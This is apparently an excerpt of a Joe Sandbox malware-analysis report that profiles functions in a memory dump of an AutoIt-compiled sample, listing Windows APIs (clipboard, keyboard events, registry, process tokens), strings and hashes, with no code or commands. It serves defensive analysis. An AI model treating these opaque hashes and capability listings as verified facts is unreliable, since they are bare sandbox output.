                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                    • Opcode ID: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                                                                                                                                                                    • Instruction ID: d9f001ac691ca9baf7b80a8597238a64a7fa391e6f246c510a5916fcb7d30e57
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B922A076A08A428AEB10CF29E84456D77A0FB88BD8F584735DE4E97B64CF7ED445CB00
                                                                                                                                                                                                                    Function 00007FF656D5DB18 Relevance: 51.2, APIs: 28, Strings: 1, Instructions: 462windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                                                                                                                                                                                    • String ID: P
                                                                                                                                                                                                                    • API String ID: 1208186926-3110715001
                                                                                                                                                                                                                    • Opcode ID: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                                                                                                                                                                    • Instruction ID: 76a5409a403c931967904dc4534a877fbdd0afc20006cc494299e745a330956c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE121272A0868286E7248B25D454BBD37A0FB95794F584B35DE4EA3ED4CF3EE481CB00
                                                                                                                                                                                                                    Function 00007FF656D432AC Relevance: 47.6, APIs: 22, Strings: 5, Instructions: 327windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                    • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                    • API String ID: 2910397461-2439800395
                                                                                                                                                                                                                    • Opcode ID: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                                                                                                                                                                    • Instruction ID: f6b3f1e913140ee97b84e7a7b63009120d095eeed3ae05ecf91604828ef32f28
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71E18076A0868187E714CF25E84466A77A0FB89BD8F544735DA8EA3B64CFBDE444CB00
                                                                                                                                                                                                                    Function 00007FF656CD4514 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 122threadkeyboardwindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                                                                                    • API String ID: 3778422247-2988720461
                                                                                                                                                                                                                    • Opcode ID: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                                                                                                                                                                    • Instruction ID: a5c58799deec07dfd7e0d32b4d82a3bf0a3e208010d244b6ba92e08bf5a065eb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53417525B0861283E7145B26E81473A3391BF88BD1F9D5B35C90AE7B54DE7F98CAC700
                                                                                                                                                                                                                    Function 00007FF656CB183C Relevance: 38.0, APIs: 25, Instructions: 475windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3372153169-0
                                                                                                                                                                                                                    • Opcode ID: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                                                                                                                                                                    • Instruction ID: 2ca2e26549d432f5526424c601cbdd3e38a8246709a1860bdbe1092221d4fd62
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B2290B2A0968285EF648B25D4542BD7771FF85B94F584632CA5EA7BA4DF3FE480C300
                                                                                                                                                                                                                    Function 00007FF656D1CE68 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227processCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                                                                                                                                                                                    • String ID: default$winsta0$winsta0\default
                                                                                                                                                                                                                    • API String ID: 3202303201-1423368268
                                                                                                                                                                                                                    • Opcode ID: 091f1a57d75101d6ed2683881d223198c216f016178f125fe8986543f304195e
                                                                                                                                                                                                                    • Instruction ID: c2dd918c5f079ed64081f8bf64bb9f724d8ccd5fc22d107a28fbd809cf12174f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 091f1a57d75101d6ed2683881d223198c216f016178f125fe8986543f304195e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5A19232B08B4286EB10CF62E8402AA73A1FB85B94F484735DE5DA7B99CF7DE045C740
                                                                                                                                                                                                                    Function 00007FF656CB2AE0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                    • API String ID: 1458621304-248962490
                                                                                                                                                                                                                    • Opcode ID: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                                                                                                                                                                                    • Instruction ID: 47edaa7d6d132aa5b1e1eb4b68daf0b000135c0369d1043a33e480fb7e88e494
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7D17E72A086428AEB14DF79D8547AC37B1FB84B98F544635DA0EA3BA8DF3DE444C740
                                                                                                                                                                                                                    Function 00007FF656D40A6C Relevance: 30.2, APIs: 20, Instructions: 169clipboardCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3222323430-0
                                                                                                                                                                                                                    • Opcode ID: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                                                                                                                                                                    • Instruction ID: 48d68aae0718d3efbb8474f2311010b4c65459da16f56585711d6f64a611afd4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43718A71A08A4382EA10AB15D45427C3361FF84B85F888B35C94EE77A1DFBEEA46C750
                                                                                                                                                                                                                    Function 00007FF656D5C6D4 Relevance: 28.9, APIs: 19, Instructions: 396windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1015379403-0
                                                                                                                                                                                                                    • Opcode ID: 0a710b93e13d857b9144ac7b186b2f10a1b031a99a6f1028557fe67ef9fb3e4e
                                                                                                                                                                                                                    • Instruction ID: ea012a5c34c1a9c2d962c5511b5aaef0cfc9bacccea0ce13d66e329b4d609126
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a710b93e13d857b9144ac7b186b2f10a1b031a99a6f1028557fe67ef9fb3e4e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37020572A0A68685EB208F21D4046BD37A1FB94794F484B3ADA5EA7FD4CF3EE545C700
                                                                                                                                                                                                                    Function 00007FF656D4206C Relevance: 27.1, APIs: 18, Instructions: 125COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3215588206-0
                                                                                                                                                                                                                    • Opcode ID: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                                                                                                                                                                    • Instruction ID: 801a04e03c42dcdd6a5e7041a907e728a6ea0c14d27b01624deb267d196d5968
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C516D32B0CB028AEB548F64E45827D33A1EB49784F188A39DA5ED3B85DE7DE495C344
                                                                                                                                                                                                                    Function 00007FF656D50AEC Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 388registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseValue$ConnectCreateRegistry
                                                                                                                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                    • API String ID: 3314541760-966354055
                                                                                                                                                                                                                    • Opcode ID: 82d0b5bcfb78c93eebd4ae76fb201b0f7a87ba8ff10155f62f0470f0a30b5334
                                                                                                                                                                                                                    • Instruction ID: c7c0570411bd93a9e0af6853f80f643f3b1d84a10f9b588dcd71baf0e90cde5c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82d0b5bcfb78c93eebd4ae76fb201b0f7a87ba8ff10155f62f0470f0a30b5334
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA026366B08B8285EB10DF26D4902AD3770FB89F88B489632DE4DA7766DF3DE445C740
                                                                                                                                                                                                                    Function 00007FF656CB5F3C Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 223COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: P
                                                                                                                                                                                                                    • API String ID: 0-3110715001
                                                                                                                                                                                                                    • Opcode ID: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                                                                                                                                                                                    • Instruction ID: d74b61f288f4110c169f44c5a4421bb87511d94df82cad968f1dadab1eab2e1a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04A1A2B2A0864186F724CF25D4546BAB770FF84788F988235DB5EA3A94CF7EE549C700
                                                                                                                                                                                                                    Function 00007FF656CF2400 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 366timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                                                                                                                                                                    • String ID: -$:$:$?
                                                                                                                                                                                                                    • API String ID: 3440502458-92861585
                                                                                                                                                                                                                    • Opcode ID: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                                                                                                                                                                    • Instruction ID: 63104b5b1ad85bce2737b4c3eed1d84d508d15297e830ee28bef1c2c0b313ae5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45E1D5B2A0828286E7249F7198516B9B7B0FB84794F4C5135EA4EE2B99DF3ED441C700
                                                                                                                                                                                                                    Function 00007FF656D372A8 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 284timefileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                                                                                                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                    • API String ID: 3232708057-3289030164
                                                                                                                                                                                                                    • Opcode ID: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                                                                                                                                                                    • Instruction ID: ae5eabf5949cc4243996d0cfdf98bb0d78bc3b0f43800260febf248c72f3b05b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DD1B4A2B18A5281EB10DB65E4410FE7771FB84794F844232EE4EE7AA9DF7ED108C740
